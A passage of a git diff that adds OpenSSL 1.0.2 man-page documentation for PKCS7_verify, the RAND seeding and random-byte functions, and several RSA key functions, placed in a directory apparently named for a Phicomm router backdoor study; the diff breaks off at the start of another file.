+contained in the B<p7> structure itself. If any signer's certificates cannot be
+located the operation fails.
+
+Each signer's certificate is chain verified using the B<smimesign> purpose and
+the supplied trusted certificate store. Any internal certificates in the message
+are used as untrusted CAs. If any chain verify fails an error code is returned.
+
+Finally the signed content is read (and written to B<out> is it is not NULL) and
+the signature's checked.
+
+If all signature's verify correctly then the function is successful.
+
+Any of the following flags (ored together) can be passed in the B<flags> parameter
+to change the default verify behaviour. Only the flag B<PKCS7_NOINTERN> is
+meaningful to PKCS7_get0_signers().
+
+If B<PKCS7_NOINTERN> is set the certificates in the message itself are not 
+searched when locating the signer's certificate. This means that all the signers
+certificates must be in the B<certs> parameter.
+
+If the B<PKCS7_TEXT> flag is set MIME headers for type B<text/plain> are deleted
+from the content. If the content is not of type B<text/plain> then an error is
+returned.
+
+If B<PKCS7_NOVERIFY> is set the signer's certificates are not chain verified.
+
+If B<PKCS7_NOCHAIN> is set then the certificates contained in the message are
+not used as untrusted CAs. This means that the whole verify chain (apart from
+the signer's certificate) must be contained in the trusted store.
+
+If B<PKCS7_NOSIGS> is set then the signatures on the data are not checked.
+
+=head1 NOTES
+
+One application of B<PKCS7_NOINTERN> is to only accept messages signed by
+a small number of certificates. The acceptable certificates would be passed
+in the B<certs> parameter. In this case if the signer is not one of the
+certificates supplied in B<certs> then the verify will fail because the
+signer cannot be found.
+
+Care should be taken when modifying the default verify behaviour, for example
+setting B<PKCS7_NOVERIFY|PKCS7_NOSIGS> will totally disable all verification 
+and any signed message will be considered valid. This combination is however
+useful if one merely wishes to write the content to B<out> and its validity
+is not considered important.
+
+Chain verification should arguably be performed  using the signing time rather
+than the current time. However since the signing time is supplied by the
+signer it cannot be trusted without additional evidence (such as a trusted
+timestamp).
+
+=head1 RETURN VALUES
+
+PKCS7_verify() returns one for a successful verification and zero
+if an error occurs.
+
+PKCS7_get0_signers() returns all signers or B<NULL> if an error occurred.
+
+The error can be obtained from L<ERR_get_error(3)|ERR_get_error(3)>
+
+=head1 BUGS
+
+The trusted certificate store is not searched for the signers certificate,
+this is primarily due to the inadequacies of the current B<X509_STORE>
+functionality.
+
+The lack of single pass processing and need to hold all data in memory as
+mentioned in PKCS7_sign() also applies to PKCS7_verify().
+
+=head1 SEE ALSO
+
+L<ERR_get_error(3)|ERR_get_error(3)>, L<PKCS7_sign(3)|PKCS7_sign(3)>
+
+=head1 HISTORY
+
+PKCS7_verify() was added to OpenSSL 0.9.5
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RAND_add.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RAND_add.pod
new file mode 100644
index 0000000..67c66f3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RAND_add.pod
@@ -0,0 +1,77 @@
+=pod
+
+=head1 NAME
+
+RAND_add, RAND_seed, RAND_status, RAND_event, RAND_screen - add
+entropy to the PRNG
+
+=head1 SYNOPSIS
+
+ #include <openssl/rand.h>
+
+ void RAND_seed(const void *buf, int num);
+
+ void RAND_add(const void *buf, int num, double entropy);
+
+ int  RAND_status(void);
+
+ int  RAND_event(UINT iMsg, WPARAM wParam, LPARAM lParam);
+ void RAND_screen(void);
+
+=head1 DESCRIPTION
+
+RAND_add() mixes the B<num> bytes at B<buf> into the PRNG state. Thus,
+if the data at B<buf> are unpredictable to an adversary, this
+increases the uncertainty about the state and makes the PRNG output
+less predictable. Suitable input comes from user interaction (random
+key presses, mouse movements) and certain hardware events. The
+B<entropy> argument is (the lower bound of) an estimate of how much
+randomness is contained in B<buf>, measured in bytes. Details about
+sources of randomness and how to estimate their entropy can be found
+in the literature, e.g. RFC 1750.
+
+RAND_add() may be called with sensitive data such as user entered
+passwords. The seed values cannot be recovered from the PRNG output.
+
+OpenSSL makes sure that the PRNG state is unique for each thread. On
+systems that provide C</dev/urandom>, the randomness device is used
+to seed the PRNG transparently. However, on all other systems, the
+application is responsible for seeding the PRNG by calling RAND_add(),
+L<RAND_egd(3)|RAND_egd(3)>
+or L<RAND_load_file(3)|RAND_load_file(3)>.
+
+RAND_seed() is equivalent to RAND_add() when B<num == entropy>.
+
+RAND_event() collects the entropy from Windows events such as mouse
+movements and other user interaction. It should be called with the
+B<iMsg>, B<wParam> and B<lParam> arguments of I<all> messages sent to
+the window procedure. It will estimate the entropy contained in the
+event message (if any), and add it to the PRNG. The program can then
+process the messages as usual.
+
+The RAND_screen() function is available for the convenience of Windows
+programmers. It adds the current contents of the screen to the PRNG.
+For applications that can catch Windows events, seeding the PRNG by
+calling RAND_event() is a significantly better source of
+randomness. It should be noted that both methods cannot be used on
+servers that run without user interaction.
+
+=head1 RETURN VALUES
+
+RAND_status() and RAND_event() return 1 if the PRNG has been seeded
+with enough data, 0 otherwise.
+
+The other functions do not return values.
+
+=head1 SEE ALSO
+
+L<rand(3)|rand(3)>, L<RAND_egd(3)|RAND_egd(3)>,
+L<RAND_load_file(3)|RAND_load_file(3)>, L<RAND_cleanup(3)|RAND_cleanup(3)>
+
+=head1 HISTORY
+
+RAND_seed() and RAND_screen() are available in all versions of SSLeay
+and OpenSSL. RAND_add() and RAND_status() have been added in OpenSSL
+0.9.5, RAND_event() in OpenSSL 0.9.5a.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RAND_bytes.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RAND_bytes.pod
new file mode 100644
index 0000000..1a9b91e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RAND_bytes.pod
@@ -0,0 +1,50 @@
+=pod
+
+=head1 NAME
+
+RAND_bytes, RAND_pseudo_bytes - generate random data
+
+=head1 SYNOPSIS
+
+ #include <openssl/rand.h>
+
+ int RAND_bytes(unsigned char *buf, int num);
+
+ int RAND_pseudo_bytes(unsigned char *buf, int num);
+
+=head1 DESCRIPTION
+
+RAND_bytes() puts B<num> cryptographically strong pseudo-random bytes
+into B<buf>. An error occurs if the PRNG has not been seeded with
+enough randomness to ensure an unpredictable byte sequence.
+
+RAND_pseudo_bytes() puts B<num> pseudo-random bytes into B<buf>.
+Pseudo-random byte sequences generated by RAND_pseudo_bytes() will be
+unique if they are of sufficient length, but are not necessarily
+unpredictable. They can be used for non-cryptographic purposes and for
+certain purposes in cryptographic protocols, but usually not for key
+generation etc.
+
+The contents of B<buf> is mixed into the entropy pool before retrieving
+the new pseudo-random bytes unless disabled at compile time (see FAQ).
+
+=head1 RETURN VALUES
+
+RAND_bytes() returns 1 on success, 0 otherwise. The error code can be
+obtained by L<ERR_get_error(3)|ERR_get_error(3)>. RAND_pseudo_bytes() returns 1 if the
+bytes generated are cryptographically strong, 0 otherwise. Both
+functions return -1 if they are not supported by the current RAND
+method.
+
+=head1 SEE ALSO
+
+L<rand(3)|rand(3)>, L<ERR_get_error(3)|ERR_get_error(3)>,
+L<RAND_add(3)|RAND_add(3)>
+
+=head1 HISTORY
+
+RAND_bytes() is available in all versions of SSLeay and OpenSSL.  It
+has a return value since OpenSSL 0.9.5. RAND_pseudo_bytes() was added
+in OpenSSL 0.9.5.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RAND_cleanup.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RAND_cleanup.pod
new file mode 100644
index 0000000..3a8f074
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RAND_cleanup.pod
@@ -0,0 +1,29 @@
+=pod
+
+=head1 NAME
+
+RAND_cleanup - erase the PRNG state
+
+=head1 SYNOPSIS
+
+ #include <openssl/rand.h>
+
+ void RAND_cleanup(void);
+
+=head1 DESCRIPTION
+
+RAND_cleanup() erases the memory used by the PRNG.
+
+=head1 RETURN VALUE
+
+RAND_cleanup() returns no value.
+
+=head1 SEE ALSO
+
+L<rand(3)|rand(3)>
+
+=head1 HISTORY
+
+RAND_cleanup() is available in all versions of SSLeay and OpenSSL.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RAND_egd.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RAND_egd.pod
new file mode 100644
index 0000000..80fa734
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RAND_egd.pod
@@ -0,0 +1,88 @@
+=pod
+
+=head1 NAME
+
+RAND_egd, RAND_egd_bytes, RAND_query_egd_bytes - query entropy gathering daemon
+
+=head1 SYNOPSIS
+
+ #include <openssl/rand.h>
+
+ int RAND_egd(const char *path);
+ int RAND_egd_bytes(const char *path, int bytes);
+
+ int RAND_query_egd_bytes(const char *path, unsigned char *buf, int bytes);
+
+=head1 DESCRIPTION
+
+RAND_egd() queries the entropy gathering daemon EGD on socket B<path>.
+It queries 255 bytes and uses L<RAND_add(3)|RAND_add(3)> to seed the
+OpenSSL built-in PRNG. RAND_egd(path) is a wrapper for
+RAND_egd_bytes(path, 255);
+
+RAND_egd_bytes() queries the entropy gathering daemon EGD on socket B<path>.
+It queries B<bytes> bytes and uses L<RAND_add(3)|RAND_add(3)> to seed the
+OpenSSL built-in PRNG.
+This function is more flexible than RAND_egd().
+When only one secret key must
+be generated, it is not necessary to request the full amount 255 bytes from
+the EGD socket. This can be advantageous, since the amount of entropy
+that can be retrieved from EGD over time is limited.
+
+RAND_query_egd_bytes() performs the actual query of the EGD daemon on socket
+B<path>. If B<buf> is given, B<bytes> bytes are queried and written into
+B<buf>. If B<buf> is NULL, B<bytes> bytes are queried and used to seed the
+OpenSSL built-in PRNG using L<RAND_add(3)|RAND_add(3)>.
+
+=head1 NOTES
+
+On systems without /dev/*random devices providing entropy from the kernel,
+the EGD entropy gathering daemon can be used to collect entropy. It provides
+a socket interface through which entropy can be gathered in chunks up to
+255 bytes. Several chunks can be queried during one connection.
+
+EGD is available from http://www.lothar.com/tech/crypto/ (C<perl
+Makefile.PL; make; make install> to install). It is run as B<egd>
+I<path>, where I<path> is an absolute path designating a socket. When
+RAND_egd() is called with that path as an argument, it tries to read
+random bytes that EGD has collected. RAND_egd() retrieves entropy from the
+daemon using the daemon's "non-blocking read" command which shall
+be answered immediately by the daemon without waiting for additional
+entropy to be collected. The write and read socket operations in the
+communication are blocking.
+
+Alternatively, the EGD-interface compatible daemon PRNGD can be used. It is
+available from
+http://prngd.sourceforge.net/ .
+PRNGD does employ an internal PRNG itself and can therefore never run
+out of entropy.
+
+OpenSSL automatically queries EGD when entropy is requested via RAND_bytes()
+or the status is checked via RAND_status() for the first time, if the socket
+is located at /var/run/egd-pool, /dev/egd-pool or /etc/egd-pool.
+
+=head1 RETURN VALUE
+
+RAND_egd() and RAND_egd_bytes() return the number of bytes read from the
+daemon on success, and -1 if the connection failed or the daemon did not
+return enough data to fully seed the PRNG.
+
+RAND_query_egd_bytes() returns the number of bytes read from the daemon on
+success, and -1 if the connection failed. The PRNG state is not considered.
+
+=head1 SEE ALSO
+
+L<rand(3)|rand(3)>, L<RAND_add(3)|RAND_add(3)>,
+L<RAND_cleanup(3)|RAND_cleanup(3)>
+
+=head1 HISTORY
+
+RAND_egd() is available since OpenSSL 0.9.5.
+
+RAND_egd_bytes() is available since OpenSSL 0.9.6.
+
+RAND_query_egd_bytes() is available since OpenSSL 0.9.7.
+
+The automatic query of /var/run/egd-pool et al was added in OpenSSL 0.9.7.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RAND_load_file.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RAND_load_file.pod
new file mode 100644
index 0000000..d8c134e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RAND_load_file.pod
@@ -0,0 +1,53 @@
+=pod
+
+=head1 NAME
+
+RAND_load_file, RAND_write_file, RAND_file_name - PRNG seed file
+
+=head1 SYNOPSIS
+
+ #include <openssl/rand.h>
+
+ const char *RAND_file_name(char *buf, size_t num);
+
+ int RAND_load_file(const char *filename, long max_bytes);
+
+ int RAND_write_file(const char *filename);
+
+=head1 DESCRIPTION
+
+RAND_file_name() generates a default path for the random seed
+file. B<buf> points to a buffer of size B<num> in which to store the
+filename. The seed file is $RANDFILE if that environment variable is
+set, $HOME/.rnd otherwise. If $HOME is not set either, or B<num> is
+too small for the path name, an error occurs.
+
+RAND_load_file() reads a number of bytes from file B<filename> and
+adds them to the PRNG. If B<max_bytes> is non-negative,
+up to to B<max_bytes> are read; starting with OpenSSL 0.9.5,
+if B<max_bytes> is -1, the complete file is read.
+
+RAND_write_file() writes a number of random bytes (currently 1024) to
+file B<filename> which can be used to initialize the PRNG by calling
+RAND_load_file() in a later session.
+
+=head1 RETURN VALUES
+
+RAND_load_file() returns the number of bytes read.
+
+RAND_write_file() returns the number of bytes written, and -1 if the
+bytes written were generated without appropriate seed.
+
+RAND_file_name() returns a pointer to B<buf> on success, and NULL on
+error.
+
+=head1 SEE ALSO
+
+L<rand(3)|rand(3)>, L<RAND_add(3)|RAND_add(3)>, L<RAND_cleanup(3)|RAND_cleanup(3)>
+
+=head1 HISTORY
+
+RAND_load_file(), RAND_write_file() and RAND_file_name() are available in
+all versions of SSLeay and OpenSSL.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RAND_set_rand_method.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RAND_set_rand_method.pod
new file mode 100644
index 0000000..e5b780f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RAND_set_rand_method.pod
@@ -0,0 +1,83 @@
+=pod
+
+=head1 NAME
+
+RAND_set_rand_method, RAND_get_rand_method, RAND_SSLeay - select RAND method
+
+=head1 SYNOPSIS
+
+ #include <openssl/rand.h>
+
+ void RAND_set_rand_method(const RAND_METHOD *meth);
+
+ const RAND_METHOD *RAND_get_rand_method(void);
+
+ RAND_METHOD *RAND_SSLeay(void);
+
+=head1 DESCRIPTION
+
+A B<RAND_METHOD> specifies the functions that OpenSSL uses for random number
+generation. By modifying the method, alternative implementations such as
+hardware RNGs may be used. IMPORTANT: See the NOTES section for important
+information about how these RAND API functions are affected by the use of
+B<ENGINE> API calls.
+
+Initially, the default RAND_METHOD is the OpenSSL internal implementation, as
+returned by RAND_SSLeay().
+
+RAND_set_default_method() makes B<meth> the method for PRNG use. B<NB>: This is
+true only whilst no ENGINE has been set as a default for RAND, so this function
+is no longer recommended.
+
+RAND_get_default_method() returns a pointer to the current RAND_METHOD.
+However, the meaningfulness of this result is dependent on whether the ENGINE
+API is being used, so this function is no longer recommended.
+
+=head1 THE RAND_METHOD STRUCTURE
+
+ typedef struct rand_meth_st
+ {
+        void (*seed)(const void *buf, int num);
+        int (*bytes)(unsigned char *buf, int num);
+        void (*cleanup)(void);
+        void (*add)(const void *buf, int num, int entropy);
+        int (*pseudorand)(unsigned char *buf, int num);
+	int (*status)(void);
+ } RAND_METHOD;
+
+The components point to the implementation of RAND_seed(),
+RAND_bytes(), RAND_cleanup(), RAND_add(), RAND_pseudo_rand()
+and RAND_status().
+Each component may be NULL if the function is not implemented.
+
+=head1 RETURN VALUES
+
+RAND_set_rand_method() returns no value. RAND_get_rand_method() and
+RAND_SSLeay() return pointers to the respective methods.
+
+=head1 NOTES
+
+As of version 0.9.7, RAND_METHOD implementations are grouped together with other
+algorithmic APIs (eg. RSA_METHOD, EVP_CIPHER, etc) in B<ENGINE> modules. If a
+default ENGINE is specified for RAND functionality using an ENGINE API function,
+that will override any RAND defaults set using the RAND API (ie.
+RAND_set_rand_method()). For this reason, the ENGINE API is the recommended way
+to control default implementations for use in RAND and other cryptographic
+algorithms.
+
+=head1 SEE ALSO
+
+L<rand(3)|rand(3)>, L<engine(3)|engine(3)>
+
+=head1 HISTORY
+
+RAND_set_rand_method(), RAND_get_rand_method() and RAND_SSLeay() are
+available in all versions of OpenSSL.
+
+In the engine version of version 0.9.6, RAND_set_rand_method() was altered to
+take an ENGINE pointer as its argument. As of version 0.9.7, that has been
+reverted as the ENGINE API transparently overrides RAND defaults if used,
+otherwise RAND API functions work as before. RAND_set_rand_engine() was also
+introduced in version 0.9.7.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RSA_blinding_on.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RSA_blinding_on.pod
new file mode 100644
index 0000000..fd2c69a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RSA_blinding_on.pod
@@ -0,0 +1,43 @@
+=pod
+
+=head1 NAME
+
+RSA_blinding_on, RSA_blinding_off - protect the RSA operation from timing attacks
+
+=head1 SYNOPSIS
+
+ #include <openssl/rsa.h>
+
+ int RSA_blinding_on(RSA *rsa, BN_CTX *ctx);
+
+ void RSA_blinding_off(RSA *rsa);
+
+=head1 DESCRIPTION
+
+RSA is vulnerable to timing attacks. In a setup where attackers can
+measure the time of RSA decryption or signature operations, blinding
+must be used to protect the RSA operation from that attack.
+
+RSA_blinding_on() turns blinding on for key B<rsa> and generates a
+random blinding factor. B<ctx> is B<NULL> or a pre-allocated and
+initialized B<BN_CTX>. The random number generator must be seeded
+prior to calling RSA_blinding_on().
+
+RSA_blinding_off() turns blinding off and frees the memory used for
+the blinding factor.
+
+=head1 RETURN VALUES
+
+RSA_blinding_on() returns 1 on success, and 0 if an error occurred.
+
+RSA_blinding_off() returns no value.
+
+=head1 SEE ALSO
+
+L<rsa(3)|rsa(3)>, L<rand(3)|rand(3)>
+
+=head1 HISTORY
+
+RSA_blinding_on() and RSA_blinding_off() appeared in SSLeay 0.9.0.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RSA_check_key.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RSA_check_key.pod
new file mode 100644
index 0000000..a5198f3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RSA_check_key.pod
@@ -0,0 +1,67 @@
+=pod
+
+=head1 NAME
+
+RSA_check_key - validate private RSA keys
+
+=head1 SYNOPSIS
+
+ #include <openssl/rsa.h>
+
+ int RSA_check_key(RSA *rsa);
+
+=head1 DESCRIPTION
+
+This function validates RSA keys. It checks that B<p> and B<q> are
+in fact prime, and that B<n = p*q>.
+
+It also checks that B<d*e = 1 mod (p-1*q-1)>,
+and that B<dmp1>, B<dmq1> and B<iqmp> are set correctly or are B<NULL>.
+
+As such, this function can not be used with any arbitrary RSA key object,
+even if it is otherwise fit for regular RSA operation. See B<NOTES> for more
+information.
+
+=head1 RETURN VALUE
+
+RSA_check_key() returns 1 if B<rsa> is a valid RSA key, and 0 otherwise.
+-1 is returned if an error occurs while checking the key.
+
+If the key is invalid or an error occurred, the reason code can be
+obtained using L<ERR_get_error(3)|ERR_get_error(3)>.
+
+=head1 NOTES
+
+This function does not work on RSA public keys that have only the modulus
+and public exponent elements populated. It performs integrity checks on all
+the RSA key material, so the RSA key structure must contain all the private
+key data too.
+
+Unlike most other RSA functions, this function does B<not> work
+transparently with any underlying ENGINE implementation because it uses the
+key data in the RSA structure directly. An ENGINE implementation can
+override the way key data is stored and handled, and can even provide
+support for HSM keys - in which case the RSA structure may contain B<no>
+key data at all! If the ENGINE in question is only being used for
+acceleration or analysis purposes, then in all likelihood the RSA key data
+is complete and untouched, but this can't be assumed in the general case.
+
+=head1 BUGS
+
+A method of verifying the RSA key using opaque RSA API functions might need
+to be considered. Right now RSA_check_key() simply uses the RSA structure
+elements directly, bypassing the RSA_METHOD table altogether (and
+completely violating encapsulation and object-orientation in the process).
+The best fix will probably be to introduce a "check_key()" handler to the
+RSA_METHOD function table so that alternative implementations can also
+provide their own verifiers.
+
+=head1 SEE ALSO
+
+L<rsa(3)|rsa(3)>, L<ERR_get_error(3)|ERR_get_error(3)>
+
+=head1 HISTORY
+
+RSA_check_key() appeared in OpenSSL 0.9.4.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RSA_generate_key.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RSA_generate_key.pod
new file mode 100644
index 0000000..881391a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RSA_generate_key.pod
@@ -0,0 +1,80 @@
+=pod
+
+=head1 NAME
+
+RSA_generate_key_ex, RSA_generate_key - generate RSA key pair
+
+=head1 SYNOPSIS
+
+ #include <openssl/rsa.h>
+
+ int RSA_generate_key_ex(RSA *rsa, int bits, BIGNUM *e, BN_GENCB *cb);
+
+Deprecated:
+
+ RSA *RSA_generate_key(int num, unsigned long e,
+    void (*callback)(int,int,void *), void *cb_arg);
+
+=head1 DESCRIPTION
+
+RSA_generate_key_ex() generates a key pair and stores it in the B<RSA>
+structure provided in B<rsa>. The pseudo-random number generator must
+be seeded prior to calling RSA_generate_key_ex().
+
+The modulus size will be of length B<bits>, and the public exponent will be
+B<e>. Key sizes with B<num> E<lt> 1024 should be considered insecure.
+The exponent is an odd number, typically 3, 17 or 65537.
+
+A callback function may be used to provide feedback about the
+progress of the key generation. If B<cb> is not B<NULL>, it
+will be called as follows using the BN_GENCB_call() function
+described on the L<BN_generate_prime(3)|BN_generate_prime(3)> page.
+
+=over 4
+
+=item *
+
+While a random prime number is generated, it is called as
+described in L<BN_generate_prime(3)|BN_generate_prime(3)>.
+
+=item *
+
+When the n-th randomly generated prime is rejected as not
+suitable for the key, B<BN_GENCB_call(cb, 2, n)> is called.
+
+=item *
+
+When a random p has been found with p-1 relatively prime to B<e>,
+it is called as B<BN_GENCB_call(cb, 3, 0)>.
+
+=back
+
+The process is then repeated for prime q with B<BN_GENCB_call(cb, 3, 1)>.
+
+RSA_generate_key is deprecated (new applications should use
+RSA_generate_key_ex instead). RSA_generate_key works in the same was as
+RSA_generate_key_ex except it uses "old style" call backs. See
+L<BN_generate_prime(3)|BN_generate_prime(3)> for further details.
+
+=head1 RETURN VALUE
+
+If key generation fails, RSA_generate_key() returns B<NULL>.
+
+The error codes can be obtained by L<ERR_get_error(3)|ERR_get_error(3)>.
+
+=head1 BUGS
+
+B<BN_GENCB_call(cb, 2, x)> is used with two different meanings.
+
+RSA_generate_key() goes into an infinite loop for illegal input values.
+
+=head1 SEE ALSO
+
+L<ERR_get_error(3)|ERR_get_error(3)>, L<rand(3)|rand(3)>, L<rsa(3)|rsa(3)>,
+L<RSA_free(3)|RSA_free(3)>, L<BN_generate_prime(3)|BN_generate_prime(3)>
+
+=head1 HISTORY
+
+The B<cb_arg> argument was added in SSLeay 0.9.0.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RSA_get_ex_new_index.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RSA_get_ex_new_index.pod
new file mode 100644
index 0000000..7d0fd1f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RSA_get_ex_new_index.pod
@@ -0,0 +1,120 @@
+=pod
+
+=head1 NAME
+
+RSA_get_ex_new_index, RSA_set_ex_data, RSA_get_ex_data - add application specific data to RSA structures
+
+=head1 SYNOPSIS
+
+ #include <openssl/rsa.h>
+
+ int RSA_get_ex_new_index(long argl, void *argp,
+		CRYPTO_EX_new *new_func,
+		CRYPTO_EX_dup *dup_func,
+		CRYPTO_EX_free *free_func);
+
+ int RSA_set_ex_data(RSA *r, int idx, void *arg);
+
+ void *RSA_get_ex_data(RSA *r, int idx);
+
+ typedef int CRYPTO_EX_new(void *parent, void *ptr, CRYPTO_EX_DATA *ad,
+                           int idx, long argl, void *argp);
+ typedef void CRYPTO_EX_free(void *parent, void *ptr, CRYPTO_EX_DATA *ad,
+                             int idx, long argl, void *argp);
+ typedef int CRYPTO_EX_dup(CRYPTO_EX_DATA *to, CRYPTO_EX_DATA *from, void *from_d,
+                           int idx, long argl, void *argp);
+
+=head1 DESCRIPTION
+
+Several OpenSSL structures can have application specific data attached to them.
+This has several potential uses, it can be used to cache data associated with
+a structure (for example the hash of some part of the structure) or some
+additional data (for example a handle to the data in an external library).
+
+Since the application data can be anything at all it is passed and retrieved
+as a B<void *> type.
+
+The B<RSA_get_ex_new_index()> function is initially called to "register" some
+new application specific data. It takes three optional function pointers which
+are called when the parent structure (in this case an RSA structure) is
+initially created, when it is copied and when it is freed up. If any or all of
+these function pointer arguments are not used they should be set to NULL. The
+precise manner in which these function pointers are called is described in more
+detail below. B<RSA_get_ex_new_index()> also takes additional long and pointer
+parameters which will be passed to the supplied functions but which otherwise
+have no special meaning. It returns an B<index> which should be stored
+(typically in a static variable) and passed used in the B<idx> parameter in
+the remaining functions. Each successful call to B<RSA_get_ex_new_index()>
+will return an index greater than any previously returned, this is important
+because the optional functions are called in order of increasing index value.
+
+B<RSA_set_ex_data()> is used to set application specific data, the data is
+supplied in the B<arg> parameter and its precise meaning is up to the
+application.
+
+B<RSA_get_ex_data()> is used to retrieve application specific data. The data
+is returned to the application, this will be the same value as supplied to
+a previous B<RSA_set_ex_data()> call.
+
+B<new_func()> is called when a structure is initially allocated (for example
+with B<RSA_new()>. The parent structure members will not have any meaningful
+values at this point. This function will typically be used to allocate any
+application specific structure.
+
+B<free_func()> is called when a structure is being freed up. The dynamic parent
+structure members should not be accessed because they will be freed up when
+this function is called.
+
+B<new_func()> and B<free_func()> take the same parameters. B<parent> is a
+pointer to the parent RSA structure. B<ptr> is a the application specific data
+(this wont be of much use in B<new_func()>. B<ad> is a pointer to the
+B<CRYPTO_EX_DATA> structure from the parent RSA structure: the functions
+B<CRYPTO_get_ex_data()> and B<CRYPTO_set_ex_data()> can be called to manipulate
+it. The B<idx> parameter is the index: this will be the same value returned by
+B<RSA_get_ex_new_index()> when the functions were initially registered. Finally
+the B<argl> and B<argp> parameters are the values originally passed to the same
+corresponding parameters when B<RSA_get_ex_new_index()> was called.
+
+B<dup_func()> is called when a structure is being copied. Pointers to the
+destination and source B<CRYPTO_EX_DATA> structures are passed in the B<to> and
+B<from> parameters respectively. The B<from_d> parameter is passed a pointer to
+the source application data when the function is called, when the function returns
+the value is copied to the destination: the application can thus modify the data
+pointed to by B<from_d> and have different values in the source and destination.
+The B<idx>, B<argl> and B<argp> parameters are the same as those in B<new_func()>
+and B<free_func()>.
+
+=head1 RETURN VALUES
+
+B<RSA_get_ex_new_index()> returns a new index or -1 on failure (note 0 is a valid
+index value).
+
+B<RSA_set_ex_data()> returns 1 on success or 0 on failure.
+
+B<RSA_get_ex_data()> returns the application data or 0 on failure. 0 may also
+be valid application data but currently it can only fail if given an invalid B<idx>
+parameter.
+
+B<new_func()> and B<dup_func()> should return 0 for failure and 1 for success.
+
+On failure an error code can be obtained from L<ERR_get_error(3)|ERR_get_error(3)>.
+
+=head1 BUGS
+
+B<dup_func()> is currently never called.
+
+The return value of B<new_func()> is ignored.
+
+The B<new_func()> function isn't very useful because no meaningful values are
+present in the parent RSA structure when it is called.
+
+=head1 SEE ALSO
+
+L<rsa(3)|rsa(3)>, L<CRYPTO_set_ex_data(3)|CRYPTO_set_ex_data(3)>
+
+=head1 HISTORY
+
+RSA_get_ex_new_index(), RSA_set_ex_data() and RSA_get_ex_data() are
+available since SSLeay 0.9.0.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RSA_new.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RSA_new.pod
new file mode 100644
index 0000000..3d15b92
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RSA_new.pod
@@ -0,0 +1,41 @@
+=pod
+
+=head1 NAME
+
+RSA_new, RSA_free - allocate and free RSA objects
+
+=head1 SYNOPSIS
+
+ #include <openssl/rsa.h>
+
+ RSA * RSA_new(void);
+
+ void RSA_free(RSA *rsa);
+
+=head1 DESCRIPTION
+
+RSA_new() allocates and initializes an B<RSA> structure. It is equivalent to
+calling RSA_new_method(NULL).
+
+RSA_free() frees the B<RSA> structure and its components. The key is
+erased before the memory is returned to the system.
+
+=head1 RETURN VALUES
+
+If the allocation fails, RSA_new() returns B<NULL> and sets an error
+code that can be obtained by L<ERR_get_error(3)|ERR_get_error(3)>. Otherwise it returns
+a pointer to the newly allocated structure.
+
+RSA_free() returns no value.
+
+=head1 SEE ALSO
+
+L<ERR_get_error(3)|ERR_get_error(3)>, L<rsa(3)|rsa(3)>,
+L<RSA_generate_key(3)|RSA_generate_key(3)>,
+L<RSA_new_method(3)|RSA_new_method(3)>
+
+=head1 HISTORY
+
+RSA_new() and RSA_free() are available in all versions of SSLeay and OpenSSL.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RSA_padding_add_PKCS1_type_1.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RSA_padding_add_PKCS1_type_1.pod
new file mode 100644
index 0000000..b8f678f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/RSA_padding_add_PKCS1_type_1.pod
